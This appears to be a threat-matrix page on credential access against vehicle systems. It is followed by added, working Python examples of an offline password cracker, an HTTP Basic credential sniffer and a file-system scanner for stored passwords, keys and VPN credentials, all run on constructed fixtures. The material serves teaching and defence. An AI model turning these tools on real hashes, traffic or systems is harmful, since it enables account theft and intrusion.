Credential Access

The adversary is trying to steal account names and passwords.

Credential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.

ID: TA0006
Created: 03 December 2023
Last Modified: 03 December 2023

Techniques

Techniques: 4
ID Name Description
T2036 Brute Force Adversaries may use brute force techniques to gain unauthorized access to vehicle systems by repeatedly guessing passwords, either online against a login interface or offline against password hashes obtained from a credential dump or a network capture.
T2037 Network Sniffing Adversaries may gain unauthorized access to vehicle systems by sniffing network traffic. Network sniffing involves monitoring or capturing information sent over a wired or wireless connection, which gives adversaries visibility into the vehicle's network activity and, in particular, any authentication material passed over the network, such as cleartext passwords or password hashes that can be cracked offline.
T2038 OS Credential Dumping Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
T2039 Unsecured Credentials Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. Bash History), operating system or other specialized files/artifacts (e.g. Private Keys).
.001 Bash History Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command line with the "history" utility. When a user logs out, the in-memory history is flushed to the user's .bash_history file, which for each user resides at the same location: ~/.bash_history. By default this file keeps the user's last 500 commands; the limits are set by the HISTSIZE and HISTFILESIZE variables, and the file is not written at all if HISTFILE is unset. Embedded Linux builds that use BusyBox ash rather than bash keep an equivalent file, typically ~/.ash_history. Users often type usernames and passwords on the command line as parameters to programs, and these are saved to the history file when they log out. Adversaries can abuse this by looking through the file for potential credentials.
.002 Credentials In Files Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
.003 Private Keys Adversaries may search for private key and certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk, .p12, .pem, .pfx, .cer, .p7b, .asc. Note that a file with one of these extensions is only a candidate: .cer and .p7b files usually hold public certificates, and .p12/.pfx containers hold a private key only if it was exported with one.
.004 VPN Credential Adversaries may search for unsecured VPN credentials to gain unauthorized access to vehicle backend servers. These credentials are intended to protect the backend server and to allow only legitimate vehicles to access it. However, if the VPN credentials are not properly secured, adversaries can extract them from the vehicle and connect directly to the backend server without a legitimate vehicle.
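The following is an added example, not code from the original page, showing the offline form of Brute Force (T2036) applied to the output of a credential dump (T2038): a dictionary attack with simple mangling rules against dumped password hashes. The dump format user:$sha256$<salt>$<hex> is hypothetical and chosen so the example runs on the Python standard library alone; real Linux shadow files use crypt(3) schemes such as $6$ (sha512crypt) or $y$ (yescrypt), which are cracked with the same loop but using a tool such as John the Ripper or hashcat. The account names, passwords, salts and wordlist are all constructed.

```python
"""Offline dictionary attack against dumped password hashes (T2036 + T2038).

Added example, not part of the original page. The 'user:$sha256$<salt>$<hex>'
dump format is hypothetical and exists only so the example is self-contained.
"""
import hashlib
from typing import Dict, Iterable, Iterator, Tuple


def hash_password(password: str, salt: str) -> str:
    """Hypothetical scheme: one SHA-256 over salt || password (fast, so cheap to brute force)."""
    return hashlib.sha256((salt + password).encode()).hexdigest()


def dump_line(user: str, password: str, salt: str) -> str:
    """Build one constructed line of the dump in the hypothetical format."""
    return f"{user}:$sha256${salt}${hash_password(password, salt)}"


# Constructed fixture standing in for the output of a credential dump (T2038).
SAMPLE_DUMP = "\n".join([
    dump_line("root", "Admin123", "k9Qz"),
    dump_line("diag", "diag2019!", "m3Lp"),
    dump_line("ota", "Xv7#pQ2rL!zT", "w1Ns"),   # long random password; not in any wordlist
])

# Constructed wordlist; real runs use rockyou-style lists with millions of entries.
WORDLIST = ["password", "admin", "diag", "vehicle", "telematics", "service"]
SUFFIXES = ["", "1", "123", "!", "2019", "2019!", "2020"]


def parse_dump(text: str) -> Dict[str, Tuple[str, str]]:
    """Map user -> (salt, digest); reject schemes this cracker does not implement."""
    entries: Dict[str, Tuple[str, str]] = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        user, spec = line.split(":", 1)
        _, algo, salt, digest = spec.split("$")
        if algo != "sha256":
            raise ValueError(f"unsupported scheme for {user}: ${algo}$")
        entries[user] = (salt, digest)
    return entries


def candidates(wordlist: Iterable[str]) -> Iterator[str]:
    """Mangling rules: case variants of each word combined with common suffixes."""
    seen = set()
    for word in wordlist:
        for base in (word, word.capitalize(), word.upper()):
            for suffix in SUFFIXES:
                cand = base + suffix
                if cand not in seen:
                    seen.add(cand)
                    yield cand


def crack(dump_text: str, wordlist: Iterable[str]) -> Tuple[Dict[str, str], int]:
    """Return (user -> recovered password, number of hash computations performed)."""
    targets = parse_dump(dump_text)
    found: Dict[str, str] = {}
    attempts = 0
    for cand in candidates(wordlist):
        for user, (salt, digest) in targets.items():
            if user in found:
                continue
            attempts += 1
            # Salted hashes must be recomputed per account; an unsalted scheme
            # would let one computation be compared against every account at once.
            if hash_password(cand, salt) == digest:
                found[user] = cand
        if len(found) == len(targets):
            break
    return found, attempts


if __name__ == "__main__":
    recovered, n = crack(SAMPLE_DUMP, WORDLIST)
    print(f"{n} hash computations, recovered: {recovered}")
```

The online variant of the same technique (guessing against a login prompt or diagnostic interface) is bounded by the target's response time and by any lockout or rate limit, which is why attackers prefer to obtain hashes and crack them offline; the defensive counterpart is a slow, salted password hash so that even the offline loop above becomes expensive.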
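As an added example for Network Sniffing (T2037), not code from the original page, the block below walks raw Ethernet/IPv4/TCP frames and pulls HTTP Basic credentials out of any request that carries them. The frames are constructed by build_frame() with made-up addresses, ports and a made-up credential so the parser runs offline; on a vehicle network the same bytes would come from a capture file or a raw socket on the in-vehicle Ethernet or Wi-Fi segment.

```python
"""Extract HTTP Basic credentials from captured frames (T2037).

Added example, not part of the original page. Frames, addresses and the
credential are constructed here; checksums are left at zero because the
parser does not verify them.
"""
import base64
import socket
import struct
from typing import List, Optional, Tuple

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6


def build_frame(payload: bytes, src_ip: str, dst_ip: str, sport: int, dport: int) -> bytes:
    """Constructed Ethernet + IPv4 (no options) + TCP (no options) frame around payload."""
    eth = bytes.fromhex("020000000001") + bytes.fromhex("020000000002") + struct.pack("!H", ETHERTYPE_IPV4)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, IPPROTO_TCP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def tcp_payload(frame: bytes) -> Optional[Tuple[str, str, int, int, bytes]]:
    """Return (src, dst, sport, dport, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    if frame[14] >> 4 != 4 or frame[23] != IPPROTO_TCP:
        return None
    ihl = (frame[14] & 0x0F) * 4                     # IP header length honours options
    src, dst = socket.inet_ntoa(frame[26:30]), socket.inet_ntoa(frame[30:34])
    tcp_start = 14 + ihl
    sport, dport = struct.unpack("!HH", frame[tcp_start:tcp_start + 4])
    data_off = (frame[tcp_start + 12] >> 4) * 4      # TCP header length honours options
    return src, dst, sport, dport, frame[tcp_start + data_off:]


def extract_basic_auth(frame: bytes) -> Optional[dict]:
    """Decode an 'Authorization: Basic' header if this segment holds a full HTTP header block."""
    parsed = tcp_payload(frame)
    if parsed is None:
        return None
    src, dst, sport, dport, payload = parsed
    head, sep, _ = payload.partition(b"\r\n\r\n")
    if not sep:
        return None                                  # header block split across segments
    for line in head.split(b"\r\n")[1:]:             # skip the request line
        name, _, value = line.partition(b":")
        if name.strip().lower() != b"authorization":
            continue
        scheme, _, token = value.strip().partition(b" ")
        if scheme.lower() != b"basic":
            continue
        try:
            user, _, password = base64.b64decode(token, validate=True).decode("utf-8").partition(":")
        except (ValueError, UnicodeDecodeError):
            return None                              # malformed token; not a credential
        return {"src": f"{src}:{sport}", "dst": f"{dst}:{dport}", "user": user, "password": password}
    return None


def sniff(frames: List[bytes]) -> List[dict]:
    """Run the extractor over a batch of frames and keep the hits."""
    return [hit for hit in (extract_basic_auth(f) for f in frames) if hit]


def sample_frames() -> List[bytes]:
    """Constructed traffic: one unauthenticated request, one with Basic auth, one non-IP frame."""
    cred = base64.b64encode(b"vin-0001:S3cretVIN").decode()
    req = (f"GET /api/vehicle/status HTTP/1.1\r\nHost: backend.example\r\n"
           f"Authorization: Basic {cred}\r\nUser-Agent: tcu/1.0\r\n\r\n").encode()
    noise = b"GET /ping HTTP/1.1\r\nHost: backend.example\r\n\r\n"
    return [build_frame(noise, "10.0.0.5", "10.0.0.1", 40001, 80),
            build_frame(req, "10.0.0.5", "10.0.0.1", 40002, 80),
            b"\x00" * 40]                            # wrong ethertype: skipped


if __name__ == "__main__":
    for hit in sniff(sample_frames()):
        print(hit)
```

Basic auth is the simplest case because the credential is only base64-encoded; the same capture position also yields session cookies, bearer tokens and challenge/response hashes, and it yields nothing useful when the session is protected by TLS with certificate validation, which is the control this technique depends on being absent.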
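The four Unsecured Credentials sub-techniques (.001 Bash History, .002 Credentials In Files, .003 Private Keys, .004 VPN Credential) are searches over the file system with different patterns, so one scanner serves all of them. The block below is an added example, not code from the original page: it writes a constructed file tree (history file, config file, PEM and certificate files, an OpenVPN profile with an auth-user-pass file) into a temporary directory and scans it. The regular expressions, paths and file contents are illustrative choices, not an exhaustive or authoritative set, and none of the values are real secrets.

```python
"""Scan a file tree for insecurely stored credentials (T2039.001-.004).

Added example, not part of the original page. Fixture files and patterns are
constructed for illustration.
"""
import os
import re
import tempfile
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Finding:
    kind: str        # bash_history | credential_in_file | private_key | vpn_credential
    path: str
    evidence: str


# .001: credentials typed as command-line parameters
HISTORY_PATTERNS = [
    re.compile(r"\s-p\S+"),                                   # mysql -pSecret
    re.compile(r"\s-u\s+[^\s:]+:\S+"),                        # curl -u user:pass
    re.compile(r"sshpass\s+-p\s*\S+"),
    re.compile(r"(?i)\w*(?:password|passwd|secret|token|api_?key|access_?key)\w*=\S+"),
]
# .002: key=value / key: value pairs in config files and source
FILE_PATTERN = re.compile(r"(?i)\b\w*(?:passw(?:or)?d|secret|token)\b\s*[=:]\s*\S+")
# .003: extensions from the technique description; the PEM header confirms private material
KEY_EXTS = {".key", ".pgp", ".gpg", ".ppk", ".p12", ".pem", ".pfx", ".cer", ".p7b", ".asc"}
PEM_PRIVATE = re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH |ENCRYPTED )?PRIVATE KEY-----")
PUTTY_KEY = re.compile(r"^PuTTY-User-Key-File-", re.M)
# .004: OpenVPN directives that point at or embed credentials
VPN_AUTH_FILE = re.compile(r"^\s*auth-user-pass\s+(\S+)", re.M)
VPN_INLINE_KEY = re.compile(r"<key>")


def build_fixture(root: str) -> None:
    """Constructed sample tree; nothing here is a real key or password."""
    files = {
        ".bash_history": "ls -la /var/log\nmysql -u root -pS3cret! telematics\n"
                         "curl -u diag:diagpass https://backend.example/api/status\n"
                         "export AWS_SECRET_ACCESS_KEY=constructed-secret-value\n",
        "etc/telematics.conf": "endpoint = https://backend.example\ntimeout = 30\nbackend_password = hunter2\n",
        "keys/ota_signing.key": "-----BEGIN RSA PRIVATE KEY-----\nMIIEconstructedNotARealKey==\n-----END RSA PRIVATE KEY-----\n",
        "keys/server.cer": "-----BEGIN CERTIFICATE-----\nMIIBconstructedNotARealCert==\n-----END CERTIFICATE-----\n",
        "vpn/backend.ovpn": "client\nremote vpn.backend.example 1194\nauth-user-pass creds.txt\n"
                            "<key>\n-----BEGIN PRIVATE KEY-----\nMIIEconstructed==\n-----END PRIVATE KEY-----\n</key>\n",
        "vpn/creds.txt": "vehicle-0001\nVpnP@ss!\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)


def scan_file(path: str) -> List[Finding]:
    findings: List[Finding] = []
    name = os.path.basename(path)
    ext = os.path.splitext(name)[1].lower()
    with open(path, "r", errors="ignore") as fh:
        text = fh.read()
    if name.endswith("_history"):                              # .bash_history, .ash_history, ...
        for line in text.splitlines():
            if any(p.search(line) for p in HISTORY_PATTERNS):
                findings.append(Finding("bash_history", path, line.strip()))
        return findings
    if ext in KEY_EXTS:
        m = PEM_PRIVATE.search(text) or PUTTY_KEY.search(text)
        if m:
            findings.append(Finding("private_key", path, m.group(0)))
        elif ext in {".p12", ".pfx"}:                          # binary container; extension is the only hint
            findings.append(Finding("private_key", path, "PKCS#12 container (by extension)"))
        return findings                                        # a .cer holding only a certificate is not reported
    m = VPN_AUTH_FILE.search(text)
    if m:                                                      # credentials file referenced by the profile
        cred_path = os.path.join(os.path.dirname(path), m.group(1))
        if os.path.exists(cred_path):
            with open(cred_path, "r", errors="ignore") as fh:
                user = fh.readline().strip()
            findings.append(Finding("vpn_credential", cred_path, f"auth-user-pass file, user={user!r}"))
        else:
            findings.append(Finding("vpn_credential", path, f"auth-user-pass references missing {m.group(1)}"))
    if VPN_INLINE_KEY.search(text) and PEM_PRIVATE.search(text):
        findings.append(Finding("vpn_credential", path, "inline <key> block with private key"))
    for line in text.splitlines():
        if FILE_PATTERN.search(line):
            findings.append(Finding("credential_in_file", path, line.strip()))
    return findings


def scan_tree(root: str) -> List[Finding]:
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            findings.extend(scan_file(os.path.join(dirpath, name)))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.kind] = counts.get(f.kind, 0) + 1
    return counts


def demo() -> List[Finding]:
    """Build the constructed tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.kind:20} {f.path}: {f.evidence}")
```

The same scanner is useful on either side: an attacker runs it after gaining a shell, and a defender runs it against a firmware image or an offboarded ECU to find what should not be there. In a defensive run, log the path and the matched pattern rather than the evidence string itself, since the scanner output would otherwise become one more file containing credentials.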